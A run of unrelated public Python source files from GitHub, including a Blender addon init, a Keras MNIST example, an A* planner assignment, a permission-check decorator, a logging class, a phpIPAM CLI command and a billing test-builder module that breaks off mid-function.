import targetweld\nfrom . import createtube\nfrom . import vnormals\nfrom . import copypaste\nfrom . import cursor\nfrom . import workplane\nfrom . import screenreflect\nfrom . import selectionmode\nfrom . import radial_align\nfrom . import edgeweight\nfrom . import grabapplymat\nfrom . import extend\nfrom . import quickmaterial\nfrom . import thicken\nfrom . import stitch\nfrom . import panel\nfrom . import gridify\nfrom . import relativeislands\nfrom . import uvtransform\nfrom . import unrotate\nfrom . import rectangularize\nfrom . import hotspot\nfrom . import uvboundstransform\nfrom . import dimensions\nfrom . import uvgrowshrink\nfrom . import preferences\nfrom . import quickboolean\nfrom . import naming\nfrom . import quicksculptnav\n\ndef register():\n\tbpy.utils.register_class( rmKitPannel_parent )\n\tbpy.utils.register_class( rmKitPannel_parent_uv )\t\n\tpolypatch.register()\n\treduce.register()\n\tcontext_bevel.register()\n\tloopring.register()\n\tmove_to_furthest.register()\n\tknifescreen.register()\t\n\tconnect_edges.register()\n\tarcadjust.register()\n\ttargetweld.register()\n\tcreatetube.register()\n\tcopypaste.register()\n\tcursor.register()\n\tworkplane.register()\n\tscreenreflect.register()\n\tselectionmode.register()\n\tradial_align.register()\n\tedgeweight.register()\n\tgrabapplymat.register()\n\textend.register()\n\tquickmaterial.register()\n\tthicken.register()\n\tpanel.register()\n\tvnormals.register()\n\tstitch.register()\n\tgridify.register()\n\trelativeislands.register()\n\tunrotate.register()\n\tuvtransform.register()\n\trectangularize.register()\n\thotspot.register()\n\tuvboundstransform.register()\n\tdimensions.register()\n\tquickboolean.register()\n\tuvgrowshrink.register()\n\tquicksculptnav.register()\n\tpreferences.register()\n\tnaming.register()\n\ndef unregister():\n\tbpy.utils.unregister_class( rmKitPannel_parent )\n\tbpy.utils.unregister_class( rmKitPannel_parent_uv )\t\n\tpolypatch.unregister()\n\treduce.unregister()\n\tcontext_bevel.unregister()\n\tloopring.unregister()\n\tmove_to_furthest.unregister()\n\tknifescreen.unregister()\n\tconnect_edges.unregister()\n\tarcadjust.unregister()\n\ttargetweld.unregister()\n\tcreatetube.unregister()\t\n\tcopypaste.unregister()\n\tcursor.unregister()\n\tworkplane.unregister()\n\tscreenreflect.unregister()\n\tselectionmode.unregister()\n\tradial_align.unregister()\n\tedgeweight.unregister()\n\tgrabapplymat.unregister()\n\textend.unregister()\n\tquickmaterial.unregister()\t\n\tthicken.unregister()\n\tpanel.unregister()\n\tvnormals.unregister()\n\tstitch.unregister()\n\tgridify.unregister()\n\trelativeislands.unregister()\n\tunrotate.unregister()\n\tuvtransform.unregister()\n\trectangularize.unregister()\n\thotspot.unregister()\n\tuvboundstransform.unregister()\n\tdimensions.unregister()\n\tquickboolean.unregister()\n\tuvgrowshrink.unregister()\n\tquicksculptnav.unregister()\n\tpreferences.unregister()\n\tnaming.unregister()","repo_name":"roosterMAP/rmKit","sub_path":"addon/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"3"} +{"seq_id":"22715824009","text":"# TESTING NORMALIZATION WITH DROPOUT's IMPORTANCE\n\nimport keras\nfrom keras import backend as K\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.utils import to_categorical\n\n# to add convolution layers\nfrom keras.layers.convolutional import Conv2D\n# to add pooling layers\nfrom keras.layers.convolutional 
import MaxPooling2D\n# to flatten layers and to also add dropout and dense\nfrom keras.layers import Flatten, Dropout, Dense\n\n# to plot things\nimport matplotlib.pyplot as plt\n\n# to import mnist data \nfrom keras.datasets import mnist\n\n# Simple convolutional network \ndef cnn_keras_model():\n\tmodel = Sequential()\n\t# 32, 3x3 convolution filters\n\tmodel.add(Conv2D(32, kernel_size = (3, 3), activation = 'relu', input_shape = input_shape))\n\t# 64, 3x3 convolution filters\n\tmodel.add(Conv2D(64, kernel_size = (3, 3), activation = 'relu'))\n\tmodel.add(MaxPooling2D(pool_size = (2,3)))\n\n\t# WE TAKE THE 25% DROPOUT OFF\n\n\t# convert data from 2D to 1D\n\tmodel.add(Flatten()) \n\t# dense layer of 128 neurons\n\tmodel.add(Dense(128, activation = 'relu'))\n\n\t# WE TAKE THE 50% DROPOUT OFF\n\n\tmodel.add(Dense(num_classes, activation = 'softmax'))\n\n\t# Adam optimizer\n\tmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\treturn model\n\n\n# fixing image dimensions\nimg_rows = 28\nimg_cols = 28\n\n# reading and preparing the data\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nif K.image_data_format() == 'channels_first':\n\tX_train = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)\n\tX_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)\n\tinput_shape = (1,img_rows, img_cols)\nelse :\n\tX_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)\n\tX_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)\n\tinput_shape = (img_rows, img_cols, 1)\n\n# normalizing data\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train /= 255\nX_test /= 255\n\n# encode outputs\ny_train = to_categorical(y_train)\ny_test = to_categorical(y_test)\nnum_classes = y_test.shape[1]\nprint(\"num_classes = \", num_classes)\n\nmodel = cnn_keras_model()\n\n# training for 12 epochs\nhist = model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=12, verbose=2)\n\n# Evaluating the model\nscores = model.evaluate(X_test, y_test, verbose=0)\n\n# check precision\nprint('---->Accuracy: {}% \\n---->Error: {}'.format(scores[1], 1 - scores[1]))\n\n# PLOTTING TRAINING EVOLUTION\nxvals = range(12)\t\t# 12 data points (because we train for 12 epochs)\nplt.clf()\t\t\t\t# Clear figure\n# plot both training and validation accuracy on the same figure\nplt.plot(xvals, hist.history[\"acc\"], label = \"Training accuracy\")\nplt.plot(xvals, hist.history[\"val_acc\"], label = \"Validation accuracy\")\nplt.legend() # display legend\nplt.show() # show the figure\n\n# output\n#\t---->Accuracy: 0.9876%\t\t& \t\t---->Error: 0.012399999999999967\n# We notice a big difference compared to the first part, where we applied normalization\n\n","repo_name":"BACCARIS/deep_learning_simple_games","sub_path":"TP3_Q1_2.py","file_name":"TP3_Q1_2.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"22455682096","text":"'''\n@Author: your name\n@Date: 2020-02-28 11:43:54\n@LastEditTime: 2020-02-28 11:50:57\n@LastEditors: Please set LastEditors\n@Description: In User Settings Edit\n@FilePath: \\vscode_code\\GitHub项目\\interesting_python\\盲僧抓包\\分析.py\n'''\nimport pandas as pd \n\ndata = pd.read_csv(r'E:\\vscode_code\\GitHub项目\\interesting_python\\盲僧抓包\\com_detailed.csv')\ndata = data[data['com_type'].isin(['有限责任公司(自然人投资或控股)',\n                                   '有限责任公司',
'有限责任公司(法人独资)'])].groupby(['reg_name']).size().reset_index()\nprint(data)\n","repo_name":"Summer-Friend/data_analyze","sub_path":"GitHub项目/interesting_python/盲僧抓包/分析.py","file_name":"分析.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"35565803364","text":"\n\"\"\"\nCOMP3620-6320 Artificial Intelligence 2017 - Planning Assignment Q2\n\nEnter your details below:\n\nName: Zi JIN\nStudent Code:\tu5541673\nemail: u5541673@anu.edu.au\n\n\nImplements the A* (a-star) search algorithm for planning.\n\nMethod to be implemented is a_star.\n\nWe import some basic data-structure that can be useful to tackle the problem. \nHave a look at *heapq* that is an efficient implementation of a priority queue using a heap data-structure\nHave a look at searchspace that gives you an implementation of a searchnode. In particular look at make_root_node and make_child_node\n\"\"\"\n\nimport heapq # heapq.xxxx\nimport logging\n\nfrom search import searchspace # make_root_node # make_child_node # extract_solution\nfrom planning_task import Task\nfrom heuristics import BlindHeuristic\n\n\n\ndef a_star(task, heuristic=BlindHeuristic):\n\t\"\"\"\n\tSearches for a plan in the given task using A* search.\n\n\t@param task The task to be solved\n\t@param heuristic A heuristic callable which computes the estimated steps\n\t\t\t\t\t from a search node to reach the goal.\n\t\"\"\"\n\t\n\theap = []\n\troot_node = searchspace.make_root_node(task.initial_state) # def __init__(self, state, parent, action, g):\n\texplored = {}\n\t\n\t\n\texplored [root_node.state] = root_node.g\n\n\tcounter = 1 \n\theapq.heappush(heap,( root_node.g+ heuristic(root_node) ,counter , root_node ))\n\tnode_expansion = 0 \n\t\n\twhile (True):\n\t\tnode = heapq.heappop(heap)[2]\n\t\tnode_expansion = node_expansion + 1\n\t\tif task.goal_reached(node.state):\n\t\t\tprint(\"------------------\")\n\t\t\tprint(\"node expansion:\")\n\t\t\tprint(node_expansion)\n\t\t\tprint(\"------------------\")\n\t\t\treturn node.extract_solution()\n\n\t\tfor successor in task.get_successor_states(node.state): # pair successor(1) or [1]\n\t\t\tsucc_state = successor[1]\n\t\t\tsucc_action = successor[0]\n\t\t\t\n\n\t\t\tnew_node = searchspace.make_child_node(node,succ_action,succ_state) #make_child_node(parent, action, state):\n\n\t\t\tif (succ_state in explored and explored[succ_state] > new_node.g) or (succ_state not in explored) : # reopen! \n\t\t\t\tcounter = counter + 1\n\t\t\t\theapq.heappush(heap,( new_node.g+ heuristic(new_node) , counter ,new_node ))\n\t\t\t\texplored [succ_state] = new_node.g\n\t\t\t\n\t\t\t\n\t\t\t'''\n\t\t\tskip = False # if the state is already in the heapq, then update it rather than push it \n\t\t\tfor elem in heap : \n\t\t\t\tif elem[2].state == succ_state:\n\t\t\t\t\ta_counter = a_counter +1\n\t\t\t\t\tskip = True \n\t\t\t\t\telem[2].parent = new_node.parent\n\t\t\t\t\telem[2].action = succ_action\n\t\t\t\t\telem[2].g = new_node.g\n\t\t\t'''\n\t\t\t\n\t\t\t#if not skip:\n\t\t\t'''\n\t\t\tif succ_state not in explored:\n\t\t\t\tcounter = counter + 1\n\t\t\t\theapq.heappush(heap,( new_node.g+ heuristic(new_node) , counter ,new_node ))\n\t\t\t\texplored [succ_state] = new_node.g\n\t\t\t'''\n\n\t\t\t\n\t'''\n\tdef find(heap, f):\n\t\t\"\"\" Returns some item n from the queue such that f(n) == True and None \n\t\t\tif there is no such item. 
\n\t\t\t(PriorityQueue, (object) -> object/None) -> object\n\t\t\"\"\"\n\t\tfor elem in heap:\n\t\t\tif f(elem[2]):\n\t\t\t\treturn elem[2]\n\t\treturn None\n\t\t\n\tdef change_priority(heap, item, priority,counter):\n\t\t\"\"\" Change the priority of the given item to the specified value. If\n\t\t\tthe item is not in the queue, a ValueError is raised.\n\t\t\t(PriorityQueue, object, int) -> None\n\t\t\"\"\"\n\t\tfor eid, elem in enumerate(heap):\n\t\t\tif elem[2] == item:\n\t\t\t\theap[eid] = (priority, count, item)\n\t\t\t\tcount += 1\n\t\t\t\theapq.heapify(heap)\n\t\t\t\treturn\n\t\traise ValueError(\"Error: \" + str(item) + \" is not in the PriorityQueue.\")\n\t'''\n\t\t\t\n\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t","repo_name":"Gin93/ARTIFICIAL-INTELLIGENCE","sub_path":"COMP3620-6230-2017-Assignment-3-Automated-Planning-master-0dc31f6148a5a8ee26687fdeeacc4ae11f17e6fc/code/search/a_star.py","file_name":"a_star.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"11003972971","text":"class Solution(object):\n def hammingDistance(self, x, y):\n \"\"\"\n The Hamming distance between two integers is the number of positions \n at which the corresponding bits are different.\n \n :type x: int\n :type y: int\n :rtype: int\n \"\"\"\n # Convert ints to 32 bit string representation\n bin_x = bin(x)[2::].zfill(32)\n bin_y = bin(y)[2::].zfill(32)\n\n print(bin_x)\n print(bin_y)\n\n count = 0\n\n for i in range(32):\n if bin_x[i] != bin_y[i]:\n count += 1\n\n return count\n\n def hammingDistance2(self, x, y):\n return bin(x ^ y).count('1')\n\n\n\ns = Solution()\ni1 = 4\ni2 = 1\n\nprint(s.hammingDistance(i1, i2))\nprint(s.hammingDistance2(i1, i2))","repo_name":"terrykwon/practice_problems","sub_path":"leetcode/461_hamming_distance.py","file_name":"461_hamming_distance.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23899214108","text":"from typing import Optional, Any, Callable\nfrom core.settings.base import PLUGINS_DIR\nfrom .exceptions import OwnerIDError, KeyChainIDError, ActionError, AccessDeniedError\nfrom .models import User, KeyChain, Action, Role, Permit\n\n\nclass BaseProtectedResource:\n\n __slots__ = 'user', 'owner_id', 'keychain_id'\n\n plugin = None # Some magic requested!\n\n def __init__(\n self,\n user: Optional[User] = None,\n owner_id: Optional[Any] = None,\n keychain_id: Optional[Any] = None):\n\n self.user = user\n self.owner_id = owner_id\n self.keychain_id = keychain_id\n\n @staticmethod\n def get_plugin_name(view_filepath: str):\n plugin = view_filepath[view_filepath.find(PLUGINS_DIR) + len(PLUGINS_DIR) + 1:]\n return plugin[:plugin.find('/')]\n\n\ndef check_authorization(action: str, when_denied: Optional[Any] = None, on_error: Optional[Callable] = None):\n def deco(func):\n def wrapper(obj: BaseProtectedResource, *args, **kwargs):\n try:\n owner = User.objects.get(id=obj.owner_id) if obj.owner_id else None\n except User.DoesNotExist:\n if on_error:\n return on_error(f\"Owner with ID {obj.owner_id} unknown\")\n raise OwnerIDError(\"Owner unknown\", obj.owner_id)\n\n try:\n act = Action.objects.get(name=action, plugin__name=obj.plugin)\n except Action.DoesNotExist:\n if on_error:\n return on_error(f\"Action with name {action} unknown\")\n raise ActionError(\"Action unknown\", action)\n\n is_owner = obj.user == owner if owner else None\n\n if obj.keychain_id:\n try:\n permits 
= KeyChain.objects.get(id=obj.keychain_id).permissions\n except KeyChain.DoesNotExist:\n if on_error:\n return on_error(f\"Keychain with ID {obj.owner_id} unknown\")\n raise KeyChainIDError(\"keychain unknown\", obj.keychain_id)\n else:\n permits = Permit.objects.filter(\n actions=act,\n roles__in=Role.objects.filter(groups__in=obj.user.groups.all())\n )\n\n permissions = (\n {\n permit.allows(\n obj.user, act, by_owner=is_owner) for permit in permits if permit.affects_on(obj.user)\n }\n )\n\n if permissions and permissions != {None}:\n if False not in permissions:\n return func(obj, *args, **kwargs)\n else:\n if act.default_rule is True:\n return func(obj, *args, **kwargs)\n\n if when_denied is not None:\n return when_denied\n\n raise AccessDeniedError('Access denied', obj.user.pk)\n\n return wrapper\n return deco\n","repo_name":"ISGNeuroTeam/complex_rest","sub_path":"complex_rest/rest_auth/authorization.py","file_name":"authorization.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10641554569","text":"import logging\nfrom logging.handlers import RotatingFileHandler\nfrom os import sep as directory_separator\nfrom traceback import format_exc, format_stack\n\nimport PyFunceble\n\n\n# pylint: disable=too-many-instance-attributes\nclass Logger: # pragma: no cover\n \"\"\"\n Provides our logging logic.\n \"\"\"\n\n format_to_apply = \"[%(asctime)s::%(levelname)s::%(origin_path)s:%(origin_line)s@%(origin_func)s](PID%(process)s:%(processName)s): %(message)s\" # pylint: disable=line-too-long\n \"\"\"\n The format to apply.\n \"\"\"\n\n root_logger_format = (\n \"[%(asctime)s::%(levelname)s](PID%(process)s:%(processName)s): %(message)s\"\n )\n \"\"\"\n The format to parse to the root logger (if used).\n \"\"\"\n\n def __init__(self, debug=False, on_screen=False, output_directory=None):\n self.on_screen = (\n on_screen\n or PyFunceble.helpers.EnvironmentVariable(\n \"DEBUG_PYFUNCEBLE_ON_SCREEN\"\n ).exists()\n )\n\n self.authorized = self.authorization(debug)\n\n self.init(output_directory)\n\n def authorization(self, debug):\n \"\"\"\n Provides the operation authorization.\n \"\"\"\n\n return (\n debug\n or self.on_screen\n or PyFunceble.helpers.EnvironmentVariable(\"DEBUG_PYFUNCEBLE\").exists()\n or PyFunceble.helpers.EnvironmentVariable(\n \"DEBUG_PYFUNCEBLE_ON_SCREEN\"\n ).exists()\n or PyFunceble.CONFIGURATION.debug\n )\n\n def init(self, output_directory=None):\n \"\"\"\n Initiates the logger.\n \"\"\"\n\n if self.authorized:\n self.formatter = logging.Formatter(self.format_to_apply)\n\n self.__set_output_directory(output_directory)\n self.__init_loggers()\n\n def __set_output_directory(self, output_directory):\n \"\"\"\n Shares the given output directory.\n\n .. 
note::\n If the given output directory does not exists, we create it.\n\n :param string output_directory: The output directory.\n \"\"\"\n\n # pylint: disable=attribute-defined-outside-init\n\n if self.authorized and not self.on_screen:\n if output_directory:\n self.output_directory = output_directory\n else:\n self.output_directory = (\n PyFunceble.OUTPUT_DIRECTORY\n + PyFunceble.OUTPUTS.parent_directory\n + PyFunceble.OUTPUTS.logs.directories.parent\n )\n\n PyFunceble.helpers.Directory(self.output_directory).create()\n\n def __init_loggers(self):\n \"\"\"\n Initiates all loggers.\n \"\"\"\n\n # pylint: disable=attribute-defined-outside-init\n\n if self.authorized and not hasattr(self, \"info_logger\"):\n self.info_logger = logging.getLogger(\"PyFunceble.info\")\n self.info_logger.setLevel(logging.INFO)\n\n self.debug_logger = logging.getLogger(\"PyFunceble.debug\")\n self.debug_logger.setLevel(logging.DEBUG)\n\n self.warning_logger = logging.getLogger(\"PyFunceble.warning\")\n self.warning_logger.setLevel(logging.WARNING)\n\n self.error_logger = logging.getLogger(\"PyFunceble.error\")\n self.error_logger.setLevel(logging.ERROR)\n\n self.fatal_logger = logging.getLogger(\"PyFunceble.fatal\")\n self.fatal_logger.setLevel(logging.FATAL)\n\n self.critical_logger = logging.getLogger(\"PyFunceble.critical\")\n self.critical_logger.setLevel(logging.CRITICAL)\n\n for logger_name in self.__dict__:\n if not logger_name.endswith(\"_logger\"):\n continue\n\n handler_type = logger_name.split(\"_\")[0].lower()\n\n current_logger = getattr(self, logger_name)\n\n if not current_logger.hasHandlers():\n current_logger.addHandler(self.__get_handler(handler_type))\n\n @classmethod\n def get_origin_info(cls):\n \"\"\"\n Returns the information about where the logger was triggered.\n\n :return:\n A tuple, which is composed of the following.\n\n (trigger file path, trigger line, trigger function/method name)\n\n :rtype: tuple\n \"\"\"\n\n stackback = [y for x in [x.split(\"\\n\") for x in format_stack()] for y in x if y]\n interest = stackback[-6].split(\",\")\n\n complete_file = interest[0].strip()[6:-1].split(directory_separator)\n\n try:\n if complete_file[-2] != PyFunceble.NAME:\n file = \"/\".join(complete_file)\n else:\n file = \"/\".join(complete_file[-2:])\n except IndexError:\n file = \"/\".join(complete_file)\n\n line = interest[1].strip().split()[-1].strip()\n func_name = interest[2].strip()[3:]\n\n return file, line, func_name\n\n def __get_handler(self, handler_type):\n \"\"\"\n Provides a handler for of the given type.\n \"\"\"\n\n handler_type = handler_type.upper()\n\n if hasattr(logging, handler_type):\n if self.on_screen:\n handler = logging.StreamHandler()\n else:\n handler = RotatingFileHandler(\n self.output_directory + f\"{handler_type.lower()}.log\",\n maxBytes=10_000_000,\n backupCount=10,\n )\n\n handler.setLevel(getattr(logging, handler_type))\n handler.setFormatter(self.formatter)\n\n return handler\n\n return None\n\n def info(self, message):\n \"\"\"\n Logs the info message.\n \"\"\"\n\n if self.authorized:\n file, line, func_name = self.get_origin_info()\n self.info_logger.info(\n message,\n extra={\n \"origin_path\": file,\n \"origin_line\": line,\n \"origin_func\": func_name,\n },\n )\n\n def debug(self, message):\n \"\"\"\n Logs the debug message.\n \"\"\"\n\n if self.authorized:\n file, line, func_name = self.get_origin_info()\n self.debug_logger.debug(\n message,\n extra={\n \"origin_path\": file,\n \"origin_line\": line,\n \"origin_func\": func_name,\n },\n )\n\n def 
warning(self, message):\n \"\"\"\n Logs the warning message.\n \"\"\"\n\n if self.authorized:\n file, line, func_name = self.get_origin_info()\n self.warning_logger.warning(\n message,\n extra={\n \"origin_path\": file,\n \"origin_line\": line,\n \"origin_func\": func_name,\n },\n )\n\n def error(self, message):\n \"\"\"\n Logs the error message.\n \"\"\"\n\n if self.authorized:\n file, line, func_name = self.get_origin_info()\n self.error_logger.error(\n message,\n extra={\n \"origin_path\": file,\n \"origin_line\": line,\n \"origin_func\": func_name,\n },\n )\n\n def fatal(self, message):\n \"\"\"\n Logs the fatal message.\n \"\"\"\n\n if self.authorized:\n file, line, func_name = self.get_origin_info()\n self.fatal_logger.fatal(\n message,\n extra={\n \"origin_path\": file,\n \"origin_line\": line,\n \"origin_func\": func_name,\n },\n )\n\n def critical(self, message):\n \"\"\"\n Logs the critical message.\n \"\"\"\n\n if self.authorized:\n file, line, func_name = self.get_origin_info()\n self.critical_logger.critical(\n message,\n extra={\n \"origin_path\": file,\n \"origin_line\": line,\n \"origin_func\": func_name,\n },\n )\n\n def exception(self):\n \"\"\"\n Logs the exception message.\n \"\"\"\n\n if self.authorized:\n file, line, func_name = self.get_origin_info()\n self.error_logger.error(\n f\"\\n{format_exc()}\",\n extra={\n \"origin_path\": file,\n \"origin_line\": line,\n \"origin_func\": func_name,\n },\n )\n","repo_name":"cargo12/PyFunceble","sub_path":"PyFunceble/engine/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":8542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"1002568946","text":"# -*- coding: utf-8 -*-\nimport click\nimport netaddr\nimport sys\nfrom ipamcli.cli import pass_context\nimport ipamcli.libs.phpipam.client as phpipam\nfrom ipamcli.libs.phpipam import exception\n\n\n@click.command('add', short_help='add new entry to phpIPAM')\n@click.option('--first-empty', is_flag=True, help='search first empty IP address')\n@click.option('--last-empty', is_flag=True, help='search last empty IP address')\n@click.option('--network', help='network address for first-empty search')\n@click.option('--vlan-id', metavar='', help='vlan id for first-empty search')\n@click.option('--vlan-name', help='vlan name for first-empty search')\n@click.option('--ip', help='ip address for new entry')\n@click.option('--mac', help='mac address for new entry')\n@click.option('--hostname', default='fqdn.local', show_default=True, help='fqdn for new entry')\n@click.option('--description', default=\"\", help='description for new entry')\n@pass_context\ndef cli(ctx, first_empty, last_empty, network, vlan_id, vlan_name, ip, mac, hostname, description):\n \"\"\"Add new entry to phpIPAM.\"\"\"\n if first_empty or last_empty:\n if not network and not vlan_id and not vlan_name:\n ctx.logerr('At least one of the --network / --vlan-id / --vlan-name option must be set when use --first-empty / --last-empty option .')\n sys.exit(1)\n\n if vlan_id:\n if vlan_id not in ctx.vlan_list:\n ctx.logerr('No such vlan id in list.')\n sys.exit(1)\n\n else:\n network = ctx.vlan_list[vlan_id]['prefix']\n\n elif vlan_name:\n for item in ctx.vlan_list:\n if ctx.vlan_list[item]['name'] == vlan_name:\n network = ctx.vlan_list[item]['prefix']\n\n if not network:\n ctx.logerr('No such vlan name in list.')\n sys.exit(1)\n\n try:\n network = netaddr.IPNetwork(network)\n\n except netaddr.core.AddrFormatError:\n ctx.logerr('Network address %s is invalid.', 
network)\n sys.exit(1)\n\n subnetId = phpipam.get_subnet_id(ctx, network)\n\n if first_empty:\n ip = phpipam.get_first_empty(ctx, network)\n elif last_empty:\n ip = phpipam.get_last_empty(ctx, network)\n\n if ip is None:\n ctx.logerr('No free IP found in subnet.')\n sys.exit(1)\n\n elif ip:\n if not phpipam.checkIP(ip):\n ctx.logerr('IP address %s is invalid.', ip)\n sys.exit(1)\n else:\n subnet = phpipam.get_subnet_by_ip(ctx, ip)\n subnetId = subnet['id']\n network = subnet['subnet']\n try:\n network = netaddr.IPNetwork(network)\n\n except netaddr.core.AddrFormatError:\n ctx.logerr('Network address %s is invalid.', network)\n sys.exit(1)\n\n else:\n ctx.logerr('At least one of the add option must be set.')\n sys.exit(1)\n\n if mac:\n if not phpipam.checkMAC(mac):\n ctx.logerr('MAC address %s is invalid.', mac)\n return\n else:\n mac = \"\"\n\n payload = {\"subnetId\": int(subnetId), \"ip\": str(ip), \"mac\": mac, \"hostname\": hostname, \"description\": description}\n try:\n result = phpipam.add_address(ctx, payload)\n\n except exception.ipamCLIIPExists:\n ctx.logerr('Oops. IP address already exists.')\n sys.exit(1)\n\n except Exception:\n ctx.logerr('Oops. HTTP API error occured.')\n sys.exit(1)\n\n if result is not None:\n ctx.log('The entry for ip %s/%s (%s) has been successfully created. The entry ID: %s.',\n ip,\n phpipam.get_network_prefix_by_subnet(network),\n phpipam.get_network_mask_by_subnet(network),\n result)\n\n else:\n ctx.logerr('Error creating entry.')\n sys.exit(1)\n","repo_name":"verdel/ipamcli","sub_path":"ipamcli/commands/cmd_add.py","file_name":"cmd_add.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29059013477","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThis module implements builders for database objects, which are useful\nfor testing.\n\nBuilders can lazily build database objects. They store all data required to\ncreate an object, but only require a session to actually create (\"build\")\nit, so they can be safely modified, serialized, created in setUp etc.\n\nExample:\n >>>invoice = InvoiceBuilder()\n >>>invoice.request.client = Getter(mapper.Client, 299139)\n >>>invoice.request.b.agency_discount_pct = 10\n >>>invoice.request.rows[0][0].product._other.tax = GenericBuilder(mapper.Tax,\n ... product=invoice.request.rows[0][0].product, nds_pct=18, nsp_pct=0,\n ... 
currency=Getter(Currency, 'RUR'))\n >>> # No session is needed until now\n >>>invoice.build(session)\n\"\"\"\n\nimport datetime\nimport collections\nimport contextlib\nimport os\nimport uuid\nimport random\nimport string\nimport mock\nimport sqlalchemy as sa\nfrom decimal import Decimal as D\nfrom pycron.sqlalchemy_mappers import JobDescr, JobSchedule\n\nfrom butils.decimal_unit import DecimalUnit as DU\nfrom billing.contract_iface import contract_meta\nfrom billing.contract_iface import ContractTypeId\n\nfrom butils.passport import INTRA_MIN, INTRA_MAX\n\nfrom balance import core\nfrom balance import mapper\nfrom balance import exc\nfrom balance import muzzle_util as ut\nfrom balance.actions.invoice_create import InvoiceFactory\nfrom balance.constants import (\n GENERIC_MESSAGE_CREATOR_MESSAGE_OPCODE,\n POSTPAY_PAYMENT_TYPE,\n FirmId,\n ServiceId,\n InvoiceRefundStatus,\n InvoiceTransferStatus,\n NirvanaTaskStatus,\n CONVERT_TYPE_COPY,\n LanguageId,\n OebsOperationType,\n RoleType,\n NirvanaProcessingTaskState,\n PromocodeApplyTypes,\n)\nfrom balance.payments import payments\n\n# Fork-compatible random generator\nRANDOM = random.SystemRandom()\n\n\ndef get_big_number():\n # Should fit in XMLRPC's int4\n return RANDOM.randint(2 ** 25, 2 ** 30)\n\n\ndef _mk_list(obj):\n return list(obj) if isinstance(obj, collections.Iterable) else [obj]\n\n\ndef generate_numeric_string(length=10):\n return str(generate_int(length))\n\n\ndef generate_character_string(length=10):\n return ''.join(RANDOM.choice(string.letters) for _ in range(length))\n\n\ndef generate_int(length=10):\n \"\"\" Generate random int of specified length (in decimal digits) \"\"\"\n assert length > 0\n min_ = 10 ** (length - 1)\n max_ = min_ * 10\n if length == 1:\n min_ = 0\n result = int((max_ - min_) * RANDOM.random())\n return result + min_\n\n\nPAYSYS_ID = 1001 # Bank payment\n\n\nclass BuilderContainer(dict):\n \"\"\"A container for builders.\n Elements can be accessed using container.elem as well as using\n container['elem']. Turns list and tuples in ListBuilders on assignment.\n \"\"\"\n\n def transform_seqs(self):\n for key, val in self.iteritems():\n if isinstance(val, (list, tuple)):\n super(self.__class__, self).__setitem__(key, ListBuilder(*val))\n\n def update(self, *args, **kwargs):\n super(self.__class__, self).update(*args, **kwargs)\n self.transform_seqs()\n\n def __setattr__(self, key, val):\n self[key] = val # call __setitem__\n\n def __getattr__(self, key):\n return self[key]\n\n def __setitem__(self, key, val):\n super(self.__class__, self).__setitem__(key, val)\n # Transform lists and tuples to ListBuilder's\n self.transform_seqs()\n\n def __delattr__(self, key):\n del self[key]\n\n # The dict returned by this method can be passed to database class __init__\n def get_objects(self):\n \"\"\"Get container content with builders replaced with object they\n have built\"\"\"\n return dict((k, (v.obj if isinstance(v, ObjectBuilder) else v))\n for k, v in self.iteritems())\n\n\nclass ObjectBuilder(object):\n \"\"\"Base class for database objects buiders. \"\"\"\n\n # Class of object to build\n _class = None\n _factory_class = None\n\n # Object attributes (simple and builders, no database object). 
Actual\n # keyword parameters to _class.__init__ are built from it.\n _build_params = None\n\n # Container for any additional objects we want to use\n # from outside OR we need to build.\n _other = None\n\n # Stored instance of built object\n _obj = None\n\n # A flag to indicate that object build process has been started (and maybe\n # completed)\n _build_has_been_started = False\n\n # If this evaluates to true, ObjectBuilder.build() will generate random\n # unique id and assign it to self._build_params.id.\n _generate_id = False\n\n # Access to object attributes for external code\n @property\n def b(self):\n return self._build_params\n\n # Built object getter - redefine in subclasses\n def get_obj(self):\n return self._obj\n\n # Access to built object for external code\n @property\n def obj(self):\n return self.get_obj()\n\n # If key is not found in self.__dict__, return value from\n # self.__build_params\n def __getattr__(self, key):\n return self.b.__getattr__(key)\n\n def __setattr__(self, key, value):\n if not key.startswith('_'):\n raise AttributeError(\n \"Assigning attributes to builder is prohibited. \"\n \"Did you mean to assign to build parameters (.b)?\\n\"\n \":_class=%s, key=%s, value=%s\" % (self._class, key, value))\n self.__dict__[key] = value\n\n def __init__(self, **params):\n self._build_params = BuilderContainer()\n self._other = BuilderContainer()\n self.prepare(**params)\n\n def set_build_params(self, **params):\n \"\"\"Set a batch of attributes\"\"\"\n for key, val in params.iteritems():\n self._build_params[key] = val\n\n def generate_unique_id(self, session, attrib_name, max_attempts=5):\n \"\"\"Generates unique id\"\"\"\n for attempt_num in xrange(max_attempts):\n id = get_big_number()\n id_exists = session.query(sa.literal(True)).filter(\n sa.exists().where(getattr(self._class, attrib_name) == id)\n 